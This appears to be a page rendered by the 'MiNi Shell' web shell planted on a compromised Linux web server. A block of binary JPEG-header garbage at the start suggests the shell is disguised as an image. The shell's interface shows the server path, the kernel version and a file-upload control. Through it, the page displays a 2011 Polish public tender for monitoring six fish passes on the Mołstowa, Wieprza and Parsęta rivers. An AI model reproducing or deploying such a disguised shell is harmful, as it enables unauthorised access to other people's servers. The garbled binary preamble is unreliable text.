JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111107/290003-N-2011.html

<p class="kh_header"><b>Szczecin: Monitoring naukowy dla 6 nowo wybudowanych przepławek w ramach zadania pn.: Budowa 6 przepławek na rzece Mołstowej, Wieprzy, Parsęcie w Województwie zachodniopomorskim współfinansowanego z środków Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013.</b><br>
<b>Numer ogłoszenia: 290003 - 2011; data zamieszczenia: 07.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych w Szczecinie , Al. Papieża Jana Pawła II 42, 70-415 Szczecin, woj. zachodniopomorskie, tel. 91 440 51 00, faks 91 440 51 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Monitoring naukowy dla 6 nowo wybudowanych przepławek w ramach zadania pn.: Budowa 6 przepławek na rzece Mołstowej, Wieprzy, Parsęcie w Województwie zachodniopomorskim współfinansowanego z środków Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Miejsce realizacji: woj. Zachodniopomorskie
rzeka Mołstowa  gm. Rymań, 
rzeka Wieprza gm. Sławno
rzeka Parsęta gm. Grzmiąca, Tychowo 
Zakres przedmiotu zamówienia:
Przedmiotem zamówienia jest przeprowadzenie monitoringu naukowego oraz stworzenie Raportu z Monitoringu Naukowego dla 6 nowo wybudowanych przepławek dla zadania pn.:
Monitoring naukowy dla 6 nowo wybudowanych przepławek w ramach zadania pn.: Budowa 6 przepławek na rzece Mołstowej, Wieprzy, Parsęcie w Województwie zachodniopomorskim współfinansowanego z środków Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013.
w następujących lokalizacjach: 
Zadanie częściowe nr I
Budowa przepławki dla ryb. Rzeka Mołstowa w km 12+100 w miejscowości Grąd.
Zadanie częściowe nr II
Budowa przepławki dla ryb. Rzeka Mołstowa w km 23+100 w miejscowości Rzesznikowo.
Zadanie częściowe nr III
Budowa przepławki dla ryb. Rzeka Wieprza w km 56+350 w miejscowości Gwiazdowo.
Zadanie częściowe nr IV
Budowa przepławki dla ryb. Rzeka Wieprza w km 49+305 w miejscowości Pomiłowo.
Zadanie częściowe nr V
Budowa przepławki dla ryb. Rzeka Parsęta w km 134+200 w miejscowości Żarnowo.
Zadanie częściowe nr VI
Budowa przepławki dla ryb. Rzeka Parsęta w km 111+300 w miejscowości Doble.
Realizacja zamówienia jest niezbędna w celu realizacji postanowień umowy o dofinansowanie w ramach środków z 3 osi priorytetowej Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013, umowa z dnia 28.09.2010r. nr 00001-61721-OR1600002/10.

W ramach zlecenia należy sporządzić Raport z Monitoringu Naukowego dla 6 nowo wybudowanych przepławek, składający się z 6 odrębnych szczegółowych raportów oraz jednego raportu stanowiącego sentencję z sześciu szczegółowych.

Podstawą do stworzenia Raportu z Monitoringu Naukowego jest monitoring przyrodniczy polegający na obserwacji i ocenie stanu oraz zachodzących zmian w składnikach różnorodności biologicznej, w tym gatunków będących przedmiotem zainteresowania Wspólnoty, ze szczególnym uwzględnieniem gatunków o znaczeniu priorytetowym, a także na ocenie skuteczności stosowanych metod ochrony przyrody.
RAPORT Z MONITORINGU NAUKOWEGO (forma papierowa)
6 szt. - odrębnie dla każdej przepławki - po 3 egzemplarze każdego raportu
1 szt. - sentencja łącząca najważniejsze informacje oraz wnioski z sześciu szczegółowych raportów z monitoringu naukowego - 3 egzemplarze

Raport z Monitoringu Naukowego powinien zawierać:
I.	Część przyrodnicza
-szczegółowy opis warunków dla bytowania i swobodnej migracji ichtiofauny przed budową przepławek, opis stanu istniejącego
-skład gatunkowy ryb występujących w danej rzece, z krótką charakterystyką gatunku:
-czy gatunek znajduje się w II załączniku Dyrektywy Siedliskowej
-behawioryzm gatunku
-skład gatunkowy oraz ilościowy prowadzonych na danej rzece zarybień z lokalizacją na mapie miejsca wpuszczenia narybku oraz analizą możliwości swobodnej migracji przed wybudowaniem przepławek (mapy, wykresy)
-perspektywy na kolejne pięć lat po wybudowaniu przepławek z uwzględnieniem całego ekosystemu danej rzeki
II.	Część techniczna
-szczegółowy opis metodyki prowadzenia monitoringu naukowego oraz gwarancyjnego, (szczegóły gwarancji w części XV), zawierający m.in. szczegółową charakterystykę poniższych parametrów , które będą uwzględniane w późniejszych raportach gwarancyjnych : 
-opis wszystkich parametrów rejestrowanych przez urządzenie
-zmiany migracji na przestrzeni danego roku jak również dla kolejnych raportów rocznych w odniesieniu do lat poprzednich (wraz z wykresami)
-zmiany migracji w odniesieniu do pozostałych parametrów zapisywanych przez urządzenie do monitoringu
-dane o ilości migrujących ryb z wyszczególnieniem gatunków ryb,
-wykresy czasowe z rozróżnieniem kierunku wędrówki w odniesieniu do wielkości oraz gatunków ryb, 
-wykresy obrazujące dobowy wzór migracji z rozróżnieniem kierunku wędrówki
-zmiany zaobserwowane na przestrzeni 5 lat w kontekście danych zawartych w raporcie wstępnym oraz raportach częściowych
-zmiany migracji na przestrzeni trwania całego monitoringu

Wykonawca zobowiązany będzie do przeszkolenia min. 6 pracowników z Oddziałów Terenowych ZZMiUW, wskazanych przez Zamawiającego, w celu prowadzenia bieżącej podstawowej konserwacji urządzeń do monitoringu (jak usuwanie zanieczyszczeń) oraz ewentualnego odczytu danych z urządzenia. Do Wykonawcy należał będzie również obowiązek regularnego kontaktu z Oddziałami Terenowymi w celu monitorowania poprawności działania urządzeń do monitoringu. Zamawiający nie określa sposobu kontaktu. Według zaistniałych potrzeb dopuszczony będzie kontakt osobisty Wykonawcy w siedzibie Oddziału Terenowego, rozmowa telefoniczna, informacja listowna lub korespondencja e-mailowa.

Zakres opracowania oraz dodatkowe obowiązki Wykonawcy określa wzór umowy stanowiący załącznik nr 3 do niniejszej SIWZ. 

Przed złożeniem oferty wymaga się od Wykonawcy sprawdzenia w terenie warunków wykonania zamówienia i złożenia oświadczenia zawartego w formularzu ofertowym stanowiącym załączniki nr 1 do niniejszej SIWZ.

Okres gwarancji dla usługi objętej zamówieniem nie może być krótszy niż cztery lata. Szczegółowe warunki gwarancji określa Karta Gwarancyjna stanowiąca załącznik nr 3 do umowy oraz wzór umowy. W ramach gwarancji Wykonawca będzie zobowiązany do prowadzenia monitoringu polegającego na zbieraniu i analizie danych z powtarzanych obserwacji oraz analizie pomiarów różnych parametrów dla śledzenia zachodzących zmian w korycie rzeki po wybudowaniu przepławek.


1.	W ramach przeglądów gwarancyjnych Wykonawca przedstawi Zamawiającemu: 
-4 gwarancyjnych raportów częściowych sporządzanych rokrocznie dla każdej z nowo wybudowanych przepławek, przesyłanych Zamawiającemu do 15go grudnia każdego kolejnego roku kalendarzowego jednak w terminie nie przekraczającym całego czasu trwania gwarancji. Pierwszy raport gwarancyjny powinien być sporządzony do dnia 15.12.2013 r.
-1 raportu stanowiącego spójne zestawienie najistotniejszych informacji oraz wniosków z wszystkich raportów częściowych oraz raportu z monitoringu naukowego, przedstawionego do dnia 31.12.2016 r.

Każdy z raportów gwarancyjnych sporządzony powinien być według metodyki podanej w Raporcie z Monitoringu Naukowego i uwzględniać m.in. poniższe dane :
-opis wszystkich parametrów rejestrowanych przez urządzenie
-analizę zmian migracji na przestrzeni danego roku jak również dla kolejnych raportów rocznych w odniesieniu do lat poprzednich (przedstawiona na wykresach jak również szczegółowo opisana)
-analizę zmian migracji w odniesieniu do pozostałych parametrów zapisywanych przez urządzenie do monitoringu
-dane o ilości migrujących ryb z wyszczególnieniem gatunków ryb,
-wykresy czasowe z rozróżnieniem kierunku wędrówki w odniesieniu do wielkości oraz gatunków ryb, 
-wykresy obrazujące dobowy wzór migracji z rozróżnieniem kierunku wędrówki
-szczegółowy opis wykresów
-szczegółowa charakterystyka rocznego okresu prowadzenia monitoringu
-szczegółowa analiza całego okresu trwania monitoringu
-analiza zmian zaobserwowanych na przestrzeli 5 lat w kontekście danych zawartych w raporcie wstępnym oraz raportach częściowych
-analiza zmian migracji na przestrzeni trwania całego monitoringu
Do każdego raportu w formie papierowej Wykonawca załączy płyty CD/DVD z zapisem z kamery oraz skanera w formacie zgodnym z normami unijnymi oraz dającym się otworzyć w jednym z ogólno dostępnych programów filmowych. 
Do każdego raportu Wykonawca załączy płyty CD/DVD ze zdjęciami zapisanymi w jednym z formatów: jpg., png., RAW, w możliwie największej rozdzielczości.
Wszystkie płyty powinny być dokładnie opisane i sklasyfikowane w odpowiednim etui/pudełku do przechowywania płyt i dostarczone w min. 3 egzemplarzach.
2.	W ramach monitoringu gwarancyjnego Wykonawca zobowiązany będzie do min. 18 wyjazdów w ciągu roku na każdą z przedmiotowych przepławek w celu :
-pobrania materiałów z urządzeń rejestrujących na zdjęciach i filmach przepływające przez przepławkę ryby
-konserwacji urządzeń polegającej na utrzymaniu w należytym stanie urządzeń do monitoringu tak aby spełniało ono w 100% swoją funkcję (czyszczenie skanera, czyszczenie kamery, usuwanie zbierających się zanieczyszczeń typu liście gałęzie oraz śmieci)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.34.50-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. WADIUM
1. Zamawiający wymaga wniesienia wadium w kwocie: 6.000,00 PLN 
2. Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia 16 listopada 2011r. do godz. 12:00, W przypadku wniesienia wadium w formie pieniężnej, za moment wniesienia wadium uznaje się moment uznania rachunku bankowego Zamawiającego.
3. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy, tj.:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego w PKO BP S.A. I Oddział w Szczecinie,
nr: 34 1020 4795 0000 9002 0122 0631.
z adnotacją: WADIUM - przetarg ozn NP/II/333/160/2011
Dowód wniesienia wadium należy dołączyć do oferty.
5. W przypadku wniesienia wadium w formie innej niż pieniężna - oryginał dokumentu
potwierdzającego wniesienie wadium należy zdeponować w siedzibie Zamawiającego w
Szczecinie, al. Papieża Jana Pawła II 42, w kasie (pok. 20), przed upływem terminu
składania ofert a kopię tego dokumentu należy załączyć do oferty.
6. Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za
wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46
ust. 4a i ust. 5 ustawy.
7. Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zgodnie z
zapisami ustawy zostanie wykluczony z prowadzonego postępowania, a jego oferta
zostanie odrzucona.
8. Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 46 ustawy.
UWAGA!
Stosownie do zapisów art. 46 ust. 4a ustawy Zamawiający zatrzymuje wadium wraz z
odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw chyba, że udowodni że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia potwierdzone wykonaniem w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługi polegającej na przeprowadzeniu badań telemetrycznych ryb, o wartości min. 40 000,00 zł (słownie: czterdzieści tysięcy złotych 00/100);
UWAGA!
W sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu musi przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą:
spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach  i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien udokumentować, że dysponuje przynajmniej jedną osobą z tytułem profesora, posiadającą wiedzę na temat behawioru ryb rzecznych udokumentowaną osiągnięciami naukowymi (min. jeden artykuł naukowy opublikowany w dowolnym czasopiśmie naukowym/zeszytach naukowych dotyczący behawioru ryb).
UWAGA!
W sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu musi przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą:
spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach  i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz oferty wg załącznika nr 1 do SIWZ.
2.	Wykaz części zamówienia powierzonych podwykonawcom- załącznik nr 4 do SIWZ.
3.	Dowód wniesienia wadium zgodnie z wymaganiami określonymi w rozdziale III, części V. pkt.1. WADIUM</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmian postanowień umowy zawartej z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie:
-zmiany terminu realizacji zamówienia przed jego upływem z przyczyn niezależnych od  Wykonawcy wskazanych przez Wykonawcę,
-zmiany przedstawiciela Wykonawcy w sprawach związanych z realizacją niniejszej umowy w tym uprawnionego do podpisania protokołu  końcowego odbioru przedmiotu umowy,
2.	Warunkiem ww. zmian będzie zaistnienie szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzmiuw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorski Zarząd Melioracji
i Urządzeń Wodnych w Szczecinie, 70-415 Szczecin, al. Papieża Jana Pawła II 42.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2011 godzina 12:00, miejsce: Zachodniopomorski Zarząd Melioracji
i Urządzeń Wodnych w Szczecinie, 70-415 Szczecin, al. Papieża Jana Pawła II 42
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com